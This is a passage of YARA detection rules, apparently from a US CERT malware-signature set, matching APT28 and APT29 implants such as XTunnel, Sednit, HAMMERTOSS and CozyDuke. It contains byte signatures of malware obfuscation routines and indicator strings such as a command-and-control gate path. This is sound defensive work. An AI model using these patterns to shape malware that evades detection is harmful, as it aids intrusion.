    $key23 = { D7 02 22 33 47 40 6C 19 99 D1 A9 82 9C BB E9 6E C8 6D 37 7A 40 E2 EE 84 56 2E A1 FA C1 C7 14 98 }
    $key24 = { CA 36 CB 11 77 38 2A 10 09 D3 92 A5 8F 7C 13 57 E9 4A D2 29 2C C0 AE 82 EE 4F 7D B0 17 91 48 E1 }
    $key25 = { C7 14 F2 3E 4C 1C 4E 55 F0 E1 FA 7F 5D 0D D6 46 58 A8 6F 84 68 1D 07 57 6D 84 07 84 15 4F 65 DC }
    $key26 = { 63 57 1B AF 73 69 04 63 4A FE E2 A7 0C B9 ED 64 61 5D E8 CA 7A EF 21 E7 73 28 6B 88 77 D0 65 DB }
    $key27 = { 27 80 8A 9B E9 8F FE 34 8D E1 DB 99 9A C9 FD FB 26 E6 C5 A0 D5 E6 88 49 0E F3 D1 86 C4 36 61 EB }
    $key28 = { B6 EB 86 A0 7A 85 D4 08 66 AF A1 00 78 9F FB 9E 85 C1 3F 5A A7 C7 A3 B6 BA 75 3C 7E AB 9D 6A 62 }
    $key29 = { 88 F0 02 03 75 D6 0B DB 85 AC DB FE 4B D7 9C D0 98 DB 2B 3F A2 CE F5 5D 43 31 DB EF CE 45 51 57 }
    $key30 = { 36 53 5A AB 29 65 87 AE 11 62 AC 5D 39 49 2D D1 24 58 11 C7 27 06 24 6A 38 FF 59 06 45 AA 5D 7B }
    $key31 = { FD B7 26 26 1C AD D5 2E 10 81 8B 49 CA B8 1B EF 11 2C B6 38 32 DA A2 6A D9 FC 71 1E A6 CE 99 A4 }
    $key32 = { 86 C0 CA A2 6D 9F D0 7D 21 5B C7 EB 14 E2 DA 25 0E 90 5D 40 6A FF AB 44 FB 1C 62 A2 EA FC 46 70 }
    $key33 = { BC 10 13 29 B0 E3 A7 D1 3F 6E BC 53 50 97 78 5E 27 D5 9E 92 D4 49 D6 D0 65 38 72 50 34 B8 C0 F0 }
    $key34 = { C8 D3 1A 78 B7 C1 49 F6 2F 06 49 7F 9D C1 DD C4 96 7B 56 6A C5 2C 3A 2A 65 AC 7A 99 64 3B 8A 2D }
    $key35 = { 0E A4 A5 C5 65 EF BB 94 F5 04 13 92 C5 F0 56 5B 6B AD C6 30 D9 00 5B 3E AD D5 D8 11 10 62 3E 1F }
    $key36 = { 06 E4 E4 6B D3 A0 FF C8 A4 12 5A 6A 02 B0 C5 6D 5D 8B 9E 37 8C F9 75 39 CE 4D 4A DF AF 89 FE B5 }
    $key37 = { 6D E2 20 40 82 1F 08 27 31 62 91 33 12 56 A1 70 E2 3F A7 6E 38 1C A7 06 6A F1 E5 19 7A E3 CF E7 }
    $key38 = { C6 EF 27 48 0F 2F 6F 40 91 00 74 A4 57 15 14 39 54 BB A7 8C D7 4E 92 41 3F 78 5B BA 5B 2A A1 21 }
    $key39 = { 19 C9 6A 28 F8 D9 69 8A DA DD 2E 31 F2 42 6A 46 FD 11 D2 D4 5F 64 16 9E DC 71 58 38 9B FA 59 B4 }
    $key40 = { C3 C3 DD BB 9D 46 45 77 23 73 A8 15 B5 12 5B B2 23 2D 87 82 91 9D 20 6E 0E 79 A6 A9 73 FF 5D 36 }
    $key41 = { C3 3A F1 60 80 37 D7 A3 AA 7F B8 60 91 13 12 B4 40 99 36 D2 36 56 40 44 CF E6 ED 42 E5 4B 78 A8 }
    $key42 = { 85 6A 08 06 A1 DF A9 4B 5E 62 AB EF 75 BE A3 B6 57 D9 88 8E 30 C8 D2 FF AE C0 42 93 0B BA 3C 90 }
    $key43 = { 24 44 96 C5 24 40 11 82 A2 BC 72 17 7A 15 CD D2 EF 55 60 1F 1D 32 1E CB F2 60 5F FD 1B 9B 8E 3F }
    $key44 = { DF 24 05 03 64 16 86 06 D2 F8 1E 4D 0D EB 1F FC 41 7F 1B 5E B1 3A 2A A4 9A 89 A1 B5 24 2F F5 03 }
    $key45 = { 54 FA 07 B8 10 8D BF E2 85 DD 2F 92 C8 4E 8F 09 CD AA 68 7F E4 92 23 7F 1B C4 34 3F F4 29 42 48 }
    $key46 = { 23 49 00 33 D6 BF 16 5B 9C 45 EE 65 94 7D 6E 61 27 D6 E0 0C 68 03 8B 83 C8 BF C2 BC E9 05 04 0C }
    $key47 = { 4E 04 40 25 C4 56 80 60 9B 6E C5 2F EB 34 91 13 0A 71 1F 73 75 AA F6 3D 69 B9 F9 52 BE FD 5F 0C }
    $key48 = { 01 9F 31 C5 F5 B2 26 90 20 EB C0 0C 1F 51 1F 2A C2 3E 9D 37 E8 93 74 51 4C 6D A4 0A 6A 03 17 6C }
    $key49 = { A2 48 31 97 FA 57 27 1B 43 E7 27 62 38 46 8C FB 84 29 32 6C BD A7 BD 09 14 61 14 7F 64 2B EB 06 }
    $key50 = { 73 1C 9D 6E 74 C5 89 B7 AC B0 19 E5 F6 A6 E0 7A CF 12 E6 8C B9 A3 96 CE 05 AA 4D 69 D5 38 70 48 }
    $key51 = { 54 0D B6 C8 D2 3F 7F 7F EF 99 64 E5 3F 44 5F 0E 56 45 9B 10 E9 31 DE EE DB 2B 57 B0 63 C7 F8 B7 }
    $key52 = { D5 AF 80 A7 EE FF 26 DE 98 8A C3 D7 CE 23 E6 25 68 81 35 51 B2 13 3F 8D 3E 97 3D A1 5E 35 58 33 }
    $key53 = { E4 D8 DB D3 D8 01 B1 70 8C 74 48 5A 97 2E 7F 00 AF B4 51 61 C7 91 EE 05 28 2B A6 86 60 FF BA 45 }
    $key54 = { D7 95 18 AF 96 C9 20 22 3D 68 7D D5 96 FC D5 45 B1 26 A6 78 B7 94 7E DF BF 24 66 1F 23 20 64 FB }
    $key55 = { B5 7C AA 4B 45 CA 6E 83 32 EB 58 C8 E7 2D 0D 98 53 B3 11 0B 47 8F EA 06 B3 50 26 D7 70 8A D2 25 }
    $key56 = { 07 7C 71 4C 47 DF CF 79 CA 27 42 B1 54 4F 4A A8 03 5B B3 4A EA 9D 51 9D EE 77 74 5E 01 46 84 08 }
    $key57 = { C3 F5 55 0A D4 24 83 9E 4C C5 4F A0 15 99 48 18 F4 FB 62 DE 99 B3 7C 87 2A F0 E5 2C 37 69 34 FA }
    $key58 = { 5E 89 04 32 AE 87 D0 FA 4D 20 9A 62 B9 E3 7A AE DE DC 8C 77 90 08 FE BA F9 E4 E6 30 4D 1B 2A AC }
    $key59 = { A4 2E DE 52 B5 AF 4C 02 CF E7 64 88 CA DE 36 A8 BB C3 20 4B CB 1E 05 C4 02 EC F4 50 07 1E FC AB }
    $key60 = { 4C DA FE 02 89 4A 04 58 31 69 E1 FB 47 17 A4 02 DA C4 4D A6 E2 53 6A E5 3F 5F 35 46 7D 31 F1 CA }
    $key61 = { 0B EF CC 95 3A D0 ED 6B 39 CE 67 81 E6 0B 83 C0 CF D1 66 B1 24 D1 96 63 30 CB A9 AD FC 9A 77 08 }
    $key62 = { 8A 43 9D C4 14 8A 2F 4D 59 96 CE 3F A1 52 FF 70 23 66 22 47 37 B8 AA 67 84 53 14 80 ED 8C 88 77 }
    $key63 = { CF 25 3B E3 B0 6B 31 09 01 FF 48 A3 51 47 13 74 AD 35 BB E4 EE 65 4B 72 B8 60 F2 A6 EC 7B 1D BB }
    $key64 = { A0 59 9F 50 C4 D0 59 C5 CF A1 68 21 E9 7C 95 96 B1 51 7B 9F B6 C6 11 6F 26 04 15 12 7F 32 CE 1F }
    $key65 = { 8B 6D 70 4F 3D C9 15 0C 6B 7D 2D 54 F9 C3 EA AB 14 65 4A CA 2C 5C 39 52 60 4E 65 DF 81 33 FE 0C }
    $key66 = { A0 6E 5C DD 38 71 E9 A3 EE 17 F7 E8 DA E1 93 EE 47 DD B8 73 39 F2 C5 99 40 2A 78 C1 5D 77 CE FD }
    $key67 = { E5 2A DA 1D 9B C4 C0 89 DB B7 71 B5 99 04 A3 E0 E2 5B 53 1B 4D 18 B5 8E 43 2D 4F A0 A4 1D 9E 8A }
    $key68 = { 47 78 A7 E2 3C 68 6C 17 1F DD CC B8 E2 6F 98 C4 CB EB DF 18 04 94 A6 47 C2 F6 E7 66 13 85 F0 5B }
    $key69 = { FE 98 3D 3A 00 A9 52 1F 87 1E D8 69 8E 70 2D 59 5C 0C 71 60 A1 18 A7 63 0E 8E C9 21 14 BA 7C 12 }
    $key70 = { 52 BA 4C 52 63 9E 71 EA BD 49 53 4B BA 80 A4 16 8D 15 76 2E 2D 1D 91 3B AB 5A 5D BF 14 D9 D1 66 }
    $key71 = { 93 1E B8 F7 BC 2A E1 79 73 35 C4 2D B5 68 43 42 7E B9 70 AB D6 01 E7 82 5C 44 41 70 1D 13 D7 B1 }
    $key72 = { 31 8F A8 ED B9 89 67 2D BE 2B 5A 74 94 9E B6 12 57 27 BD 2E 28 A4 B0 84 E8 F1 F5 06 04 CC B7 35 }
    $key73 = { 5B 5F 23 15 E8 8A 42 A7 B5 9C 1B 49 3A D1 5B 92 F8 19 C0 21 BD 70 A5 A6 61 9A AC 66 66 63 9B C2 }
    $key74 = { C2 BE D7 AA 48 19 51 FE B5 6C 47 F0 3E A3 82 36 BC 42 57 79 B2 FD 1F 13 97 CB 79 FE 2E 15 C0 F0 }
    $key75 = { D3 97 9B 1C B0 EC 1A 65 59 61 55 97 04 D7 CD C0 19 25 3A CB 22 59 DF B9 25 58 B7 53 6D 77 44 41 }
    $key76 = { 0E DF 5D BE CB 77 24 24 D8 79 BB DD 51 89 9D 6A AE D7 36 D0 31 15 89 56 6D 41 A9 DB B8 ED 1C C7 }
    $key77 = { CC 79 85 98 F0 A9 BC C8 23 78 A5 74 01 43 DE AF 1A 14 7F 4B 29 08 A1 97 49 4B 72 02 38 8E C9 05 }
    $key78 = { 07 4E 9D F7 F8 59 BF 1B D1 65 8F D2 A8 6D 81 C2 82 00 0E AB 09 AF 42 52 FA B4 54 33 42 1D 38 49 }
    $key79 = { 6C D5 40 64 2E 00 7F 00 65 0E D2 0D 7B 54 CF FD 54 DD A9 5D 8D EB B0 87 A0 04 BA E2 22 F2 2C 8E }
    $key80 = { C7 6C F2 F6 6C 71 F6 D1 7F C8 DE FA 1C AE F8 71 8B A1 CE 18 8C 7E A0 2C 83 5A 0F A5 4D 3B 33 14 }
    $key81 = { A7 25 0A 14 96 00 E5 15 C9 C4 0F E5 72 07 56 FD A8 25 16 35 A3 B6 61 26 10 70 CB 5D AB FE 72 53 }
    $key82 = { 23 7C 67 B9 7D 4C CE 46 10 DE 2B 82 E5 82 80 8E A7 96 C3 4A 4C 24 71 5C 95 3C BA 40 3B 2C 93 5E }
    $key83 = { A8 FA 18 25 47 E6 6B 57 C4 97 DA AA 19 5A 38 C0 F0 FB 0A 3C 1F 7B 98 B4 B8 52 F5 F3 7E 88 51 27 }
    $key84 = { 83 69 4C CA 50 B8 21 14 4F FB BE 68 55 F6 28 45 F1 32 81 11 AE 1A C5 66 6C BA 59 EB 43 AA 12 C6 }
    $key85 = { 14 5E 90 64 16 B1 78 65 AD 37 CD 02 2D F5 48 1F 28 C9 30 D6 E3 F5 3C 50 B0 95 3B F3 3F 4D B9 53 }
    $key86 = { AB 49 B7 C2 FA 30 27 A7 67 F5 AA 94 EA F2 B3 12 BB E3 E8 9F D9 24 EF 89 B9 2A 7C F9 77 35 4C 22 }
    $key87 = { 7E 04 E4 78 34 0C 20 9B 01 CA 2F EB BC E3 FE 77 C6 E6 16 9F 0B 05 28 C4 2F A4 BD A6 D9 0A C9 57 }
    $key88 = { 0E AD D0 42 B9 F0 DD BA BA 0C A6 76 EF A4 ED B6 8A 04 55 95 09 7E 5A 39 22 17 DF FC 21 A8 53 2F }
    $key89 = { 56 23 71 0F 13 4E CA CD 5B 70 43 4A 14 31 00 9E 35 56 34 3E D4 8E 77 F6 A5 57 F2 C7 FF 46 F6 55 }
    $key90 = { 69 68 65 7D B6 2F 4A 11 9F 8E 5C B3 BF 5C 51 F4 B2 85 32 86 13 AA 7D B9 01 6F 80 00 B5 76 56 1F }
    $key91 = { DE BB 9C 95 EA E6 A6 89 74 02 3C 33 5F 8D 27 11 13 5A 98 26 04 15 DF 05 84 5F 05 3A D6 5B 59 B4 }
    $key92 = { 16 F5 49 00 DB F0 89 50 F2 C5 83 51 53 AB 63 66 05 FB 8C 09 10 6C 0E 94 CB 13 CE A1 6F 27 56 85 }
    $key93 = { 1C 9F 86 F8 8F 0F 48 82 D5 CB D3 28 76 36 8E 7B 31 1A 84 41 86 92 D6 52 A6 A4 F3 15 CC 49 9A E8 }
    $key94 = { E9 20 E0 78 30 28 FA 05 F4 CE 2D 6A 04 BB E6 36 D5 6A 77 5C FD 4D AE A3 F2 A1 B8 BE EB 52 A6 D4 }
    $key95 = { 73 87 4C A3 AF 47 A8 A3 15 D5 0E 19 90 F4 4F 65 5E C7 C1 5B 14 6F FE 06 11 B6 C4 FC 09 6B D0 7C }
    $key96 = { F2 1C 1F A1 63 C7 45 78 9C 53 92 2C 47 E1 91 A5 A8 53 01 BD C2 FF C3 D3 B6 88 CF BF F3 9F 3B E5 }
    $key97 = { BC 5A 86 1F 21 CB 98 BD 1E 2A E9 65 0B 7A 0B B4 CD 0C 71 90 0B 34 63 C1 BC 33 80 AF D2 BB 94 8E }
    $key98 = { 15 1B AE 36 E6 46 F3 05 70 DC 6A 7B 57 75 2F 24 81 A0 B4 8D D5 18 4E 91 4B CF 41 1D 8A D5 AC A0 }
    $key99 = { F0 5A D6 D7 A0 CA DC 10 A6 46 8B FD BC BB 22 3D 5B D6 CA 30 EE 19 C2 39 E8 03 57 72 D8 03 12 C9 }
    $key100 = { 5D E9 A0 FD B3 7C 0D 59 C2 98 57 7E 53 79 BC AF 4F 86 DF 3E 9F A1 77 87 A4 CE FA 7D D1 0C 46 2E }
    $key101 = { F5 E6 2B A8 62 38 02 24 D1 59 A3 24 D2 5F D3 21 E5 B3 5F 85 54 D7 0C F9 A5 06 76 77 13 BC A5 08 }
    $key102 = { A2 D1 B1 04 09 B3 28 DA 0C CB FF DE 2A D2 FF 10 85 5F 95 DA 36 A1 D3 DB A8 49 52 BB 05 F8 C3 A7 }
    $key103 = { C9 74 AB D2 27 D3 AD 33 9F AC 11 C9 7E 11 D9 04 70 6E DE A6 10 B1 81 B8 FA D4 73 FF CC 36 A6 95 }
    $key104 = { AB 51 67 D2 24 14 06 C3 C0 17 8D 3F 28 66 43 98 D5 21 3E E5 D2 C0 9D CC 94 10 CB 60 46 71 F5 F1 }
    $key105 = { C2 5C C4 E6 71 CA AA 31 E1 37 70 0A 9D B3 A2 72 D4 E1 57 A6 A1 F4 72 35 04 3D 95 4B AE 8A 3C 70 }
    $key106 = { E6 00 57 57 CA 01 89 AC 38 F9 B6 D5 AD 58 48 81 39 9F 28 DA 94 9A 0F 98 D8 A4 E3 86 2E 20 F7 15 }
    $key107 = { 20 4E 6C EB 4F F5 97 87 EF 4D 5C 9C A5 A4 1D DF 44 45 B9 D8 E0 C9 70 B8 6D 54 3E 9C 74 35 B1 94 }
    $key108 = { 83 1D 7F D2 13 16 59 02 63 B6 9E 09 5A BB E8 9E 01 A1 76 E1 6A E7 99 D8 3B D7 74 AF 0D 25 43 90 }
    $key109 = { 42 C3 63 55 D9 BC 57 3D 72 F5 46 CD B1 2E 6B B2 CF E2 93 3A C9 2C 12 04 03 86 B3 10 AB F6 A1 ED }
    $key110 = { B9 04 43 93 C0 9A D0 33 90 16 00 41 44 6B F3 13 4D 86 4D 16 B2 5F 1A B5 E5 CD C6 90 C4 67 7E 7D }
    $key111 = { 6B C1 10 2B 5B E0 5E EB F6 5E 2C 3A CA 1F 4E 17 A5 9B 2E 57 FB 48 0D E0 16 D3 71 DA 3A EF 57 A5 }
    $key112 = { B0 68 D0 0B 48 2F F7 3F 8D 23 79 57 43 C7 6F E8 63 9D 40 5E E5 4D 3E FB 20 AF D5 5A 9E 2D FF 4E }
    $key113 = { 95 CF 5A DD FE 51 1C 8C 74 96 E3 B7 5D 52 A0 C0 EF E0 1E D5 2D 5D D0 4D 0C A6 A7 AB D3 A6 F9 68 }
    $key114 = { 75 53 45 74 A4 62 00 19 F8 E3 D0 55 36 70 16 25 50 34 FA 7D 91 CB CA 9E 71 71 49 44 17 42 AC 8D }
    $key115 = { 96 F1 01 3A 53 01 53 4B E4 24 A1 1A 94 B7 40 E5 EB 3A 62 7D 05 2D 1B 76 9E 64 BA B6 A6 66 43 3C }
    $key116 = { 58 44 77 AB 45 CA F7 29 EE 98 44 83 4F 84 68 3A BE CA B7 C4 F7 D2 3A 96 36 F5 4C DD 5B 8F 19 B3 }
    $key117 = { D3 90 5F 18 5B 56 41 49 EE 85 CC 3D 09 34 77 C8 FF 2F 8C F6 01 C6 8C 38 BB D8 15 17 67 2E CA 3A }
    $key118 = { BF 29 52 1A 7F 94 63 6D 19 30 AA 23 64 22 EB 63 51 77 5A 52 3D E6 8A F9 BF 9F 10 26 CE DA 61 8D }
    $key119 = { 04 B3 A7 83 47 0A F1 61 3A 9B 84 9F BD 6F 02 0E E6 5C 61 23 43 EB 1C 02 8B 2C 28 59 07 89 E6 0B }
    $key120 = { 3D 8D 8E 84 97 7F E5 D2 1B 69 71 D8 D8 73 E7 BE D0 48 E2 13 33 FE 15 BE 2B 3D 17 32 C7 FD 3D 04 }
    $key121 = { 8A CB 88 22 4B 6E F4 66 D7 65 3E B0 D8 25 6E A8 6D 50 BB A1 4F D0 5F 7A 0E 77 AC D5 74 E9 D9 FF }
    $key122 = { B4 61 21 FF CF 15 65 A7 7A A4 57 52 C9 C5 FB 37 16 B6 D8 65 87 37 DF 95 AE 8B 6A 23 74 43 22 28 }
    $key123 = { A4 43 28 74 58 8D 1B D2 31 72 24 FB 37 1F 32 4D D6 0A B2 5D 41 91 F2 F0 1C 5C 13 90 9F 35 B9 43 }
    $key124 = { 78 E1 B7 D0 6E D2 A2 A0 44 C6 9B 7C E6 CD C9 BC D7 7C 19 18 0D 0B 08 2A 67 1B BA 06 50 73 49 C8 }
    $key125 = { 54 01 98 C3 D3 3A 63 18 01 FE 94 E7 CB 5D A3 A2 D9 BC BA E7 C7 C3 11 2E DE CB 34 2F 3F 7D F7 93 }
    $key126 = { 7E 90 56 52 CA B9 6A CB B7 FE B2 82 5B 55 24 35 11 DF 1C D8 A2 2D 06 80 F8 3A AF 37 B8 A7 CB 36 }
    $key127 = { 37 21 88 01 DB F2 CD 92 F0 7F 15 4C D5 39 81 E6 18 9D BF BA CA C5 3B C2 00 EA FA B8 91 C5 EE C8 }
  condition:
    any of them
}

rule IMPLANT_5_v3 {
  meta:
    description = "XTunnel Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $BYTES1 = { 0F AF C0 6? C0 07 00 00 00 2D 01 00 00 00 0F AF ?? 39 ?8 }
    $BYTES2 = { 0F AF C0 6? C0 07 48 0F AF ?? 39 ?8 }
  condition:
    any of them
}

rule IMPLANT_5_v4 {
  meta:
    description = "XTunnel Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $FBKEY1 = { 98 7A B9 99 FE 09 24 A2 DF 0A 41 2B 14 E2 60 93 74 6F CD F9 BA 31 DC 05 53 68 92 C3 3B 11 6A D3 }
    $FBKEY2 = { 8B 23 6C 89 2D 90 2B 0C 9A 6D 37 AE 4F 98 42 C3 07 0F BD C1 40 99 C6 93 01 58 56 3C 6A C0 0F F5 }
    $FBKEY3 = { E4 7B 7F 11 0C AA 1D A6 17 54 55 67 EC 97 2A F3 A6 E7 B4 E6 80 7B 79 81 D3 CF BD 3D 8F CC 33 73 }
    $FBKEY4 = { 48 B2 84 54 5C A1 FA 74 F6 4F DB E2 E6 05 D6 8C ED 8A 72 6D 05 EB EF D9 BA AC 16 4A 79 49 BD C1 }
    $FBKEY5 = { FB 42 15 58 E3 0F CC D9 5F A7 BC 45 AC 92 D2 99 1C 44 07 22 30 F6 FB EA A2 11 34 1B 5B F2 DC 56 }
  condition:
    all of them
}

rule IMPLANT_6_v1 {
  meta:
    description = "Sednit / EVILTOSS Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = "dll.dll" ascii wide
    $STR2 = "Init1" ascii wide
    $STR3 = "netui.dll" ascii wide
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_6_v2 {
  meta:
    description = "Sednit / EVILTOSS Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $obf_func = { 8B 45 F8 6A 07 03 C7 33 D2 89 45 E8 8D 47 01 5B 02 4D 0F F7 F3 6A 07 8A 04 32 33 D2 F6 E9 8A C8 8B C7 F7 F3 8A 44 3E FE 02 45 FC 02 0C 32 B2 03 F6 EA 8A D8 8D 47 FF 33 D2 5F F7 F7 02 5D 14 8B 45 E8 8B 7D F4 C0 E3 06 02 1C 32 32 CB 30 08 8B 4D 14 41 47 83 FF 09 89 4D 14 89 7D F4 72 A1 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_6_v3 {
  meta:
    description = "Sednit / EVILTOSS Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $deob_func = { 8D 46 01 02 D1 83 E0 07 8A 04 38 F6 EA 8B D6 83 E2 07 0A 04 3A 33 D2 8A 54 37 FE 03 D3 03 D1 D3 EA 32 C2 8D 56 FF 83 E2 07 8A 1C 3A 8A 14 2E 32 C3 32 D0 41 88 14 2E 46 83 FE 0A 7C ?? }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_6_v4 {
  meta:
    description = "Sednit / EVILTOSS Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $ASM = { 53 5? 5? [6-15] FF D? 8B ?? B? A0 86 01 00 [7-13] FF D? ?B [6-10] C0 [0-1] C3 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_6_v5 {
  meta:
    description = "Sednit / EVILTOSS Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 83 EC 18 8B 4C 24 24 B8 AB AA AA AA F7 E1 8B 44 24 20 53 55 8B EA 8D 14 08 B8 AB AA AA AA 89 54 24 1C F7 E2 56 8B F2 C1 ED 02 8B DD 57 8B 7C 24 38 89 6C 24 1C C1 EE 02 3B DE 89 5C 24 18 89 74 24 20 0F 83 CF 00 00 00 8D 14 5B 8D 44 12 FE 89 44 24 10 3B DD 0F 85 CF 00 00 00 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA 83 F9 06 89 4C 24 38 0F 83 86 00 00 00 8A C3 B2 06 F6 EA 8B 54 24 10 88 44 24 30 8B 44 24 2C 8D 71 02 03 D0 89 54 24 14 8B 54 24 10 33 C0 8A 44 37 FE 03 D6 8B D8 8D 46 FF 0F AF DA 33 D2 BD 06 00 00 00 F7 F5 C1 EB 07 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 30 32 CB 88 0C 30 8B 4C 24 38 41 46 83 FE 08 89 4C 24 38 72 A1 8B 5C 24 18 8B 6C 24 1C 8B 74 24 20 8B 4C 24 10 43 83 C1 06 3B DE 89 4C 24 10 8B 4C 24 34 89 5C 24 18 0F 82 3C FF FF FF 3B DD 75 1A 8B C1 33 D2 B9 06 00 00 00 F7 F1 8B CA EB 0D 33 C9 89 4C 24 38 E9 40 FF FF FF 33 C9 8B 44 24 24 33 D2 BE 06 00 00 00 89 4C 24 38 F7 F6 3B CA 89 54 24 24 0F 83 95 00 00 00 8A C3 B2 06 F6 EA 8D 1C 5B 88 44 24 30 8B 44 24 2C 8D 71 02 D1 E3 89 5C 24 34 8D 54 03 FE 89 54 24 14 EB 04 8B 5C 24 34 33 C0 BD 06 00 00 00 8A 44 3E FE 8B D0 8D 44 1E FE 0F AF D0 C1 EA 07 89 54 24 2C 8D 46 FF 33 D2 BB 06 00 00 00 F7 F3 8B 5C 24 2C 8A 04 3A 33 D2 32 D8 8D 46 01 F7 F5 8A 44 24 30 02 C1 8A 0C 3A 33 D2 32 C8 8B C6 F7 F5 8A 04 3A 22 C8 8B 44 24 14 02 D9 8A 0C 06 32 CB 88 0C 06 8B 4C 24 38 8B 44 24 24 41 46 3B C8 89 4C 24 38 72 8F 5F 5E 5D 5B 83 C4 18 C2 10 00 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_6_v6 {
  meta:
    description = "Sednit / EVILTOSS Implant by APT28"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $Init1_fun = { 68 10 27 00 00 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 6A FF 50 FF 15 ?? ?? ?? ?? 33 C0 C3 }
  condition:
    (uint16(0) == 23117 or uint16(0) == 53200 or uint16(0) == 50132 or uint32(0) == 1178882085 or uint32(1) == 1718907484) and all of them
}

rule IMPLANT_7_v1 {
  meta:
    description = "Implant 7 by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 8A 44 0A 03 32 C3 0F B6 C0 66 89 04 4E 41 3B CF 72 EE }
    $STR2 = { F3 0F 6F 04 08 66 0F EF C1 F3 0F 7F 04 11 83 C1 10 3B CF 72 EB }
  condition:
    (uint16(0) == 23117) and ($STR1 or $STR2)
}

rule IMPLANT_8_v1 {
  meta:
    description = "HAMMERTOSS / HammerDuke Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $DOTNET = "mscorlib" ascii
    $REF_URL = "https://www.google.com/url?sa=" wide
    $REF_var_1 = "&rct=" wide
    $REF_var_2 = "&q=&esrc=" wide
    $REF_var_3 = "&source=" wide
    $REF_var_4 = "&cd=" wide
    $REF_var_5 = "&ved=" wide
    $REF_var_6 = "&url=" wide
    $REF_var_7 = "&ei=" wide
    $REF_var_8 = "&usg=" wide
    $REF_var_9 = "&bvm=" wide
    $REF_value_1 = "QFj" wide
    $REF_value_2 = "bv.81" wide
  condition:
    (uint16(0) == 23117) and ($DOTNET) and ($REF_URL) and (3 of ($REF_var*)) and (1 of ($REF_value*))
}

rule IMPLANT_9_v1 {
  meta:
    description = "Onion Duke Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $STR1 = { 8B 03 8A 54 01 03 32 55 FF 41 88 54 39 FF 3B CE 72 EE }
    $STR2 = { 8B C8 83 E1 03 8A 54 19 08 8B 4D 08 32 54 01 04 40 88 54 38 FF 3B C6 72 E7 }
    $STR3 = { 8B 55 F8 8B C8 83 E1 03 8A 4C 11 08 8B 55 FC 32 0C 10 8B 17 88 4C 02 04 40 3B 06 72 E3 }
  condition:
    (uint16(0) == 23117 or uint16(0)) and all of them
}

rule IMPLANT_10_v2 {
  meta:
    description = "CozyDuke / CozyCar / CozyBear Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $xor = { 34 ?? 66 33 C1 48 FF C1 }
    $nop = { 66 66 66 66 66 66 0F 1F 84 00 00 00 00 00 }
  condition:
    uint16(0) == 23117 and $xor and $nop
}

rule Unidentified_Malware_Two {
  meta:
    description = "Unidentified Implant by APT29"
    author = "US CERT"
    reference = "https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE"
    date = "2017-02-10"
    score = 85
  strings:
    $my_string_one = "/zapoy/gate.php"
    $my_string_two = { E3 40 FE 45 FD 0F B6 45 FD 0F B6 14 38 88 55 FF 00 55 FC 0F B6 45 FC 8A 14 38 88 55 FE 0F B6 45 FD 88 14 38 0F B6 45 FC 8A 55 FF 88 14 38 8A 55 FF 02 55 FE 8A 14 3A 8B 45 F8 30 14 30 }
    $my_string_three = "S:\\Lidstone\\renewing\\HA\\disable\\In.pdb"
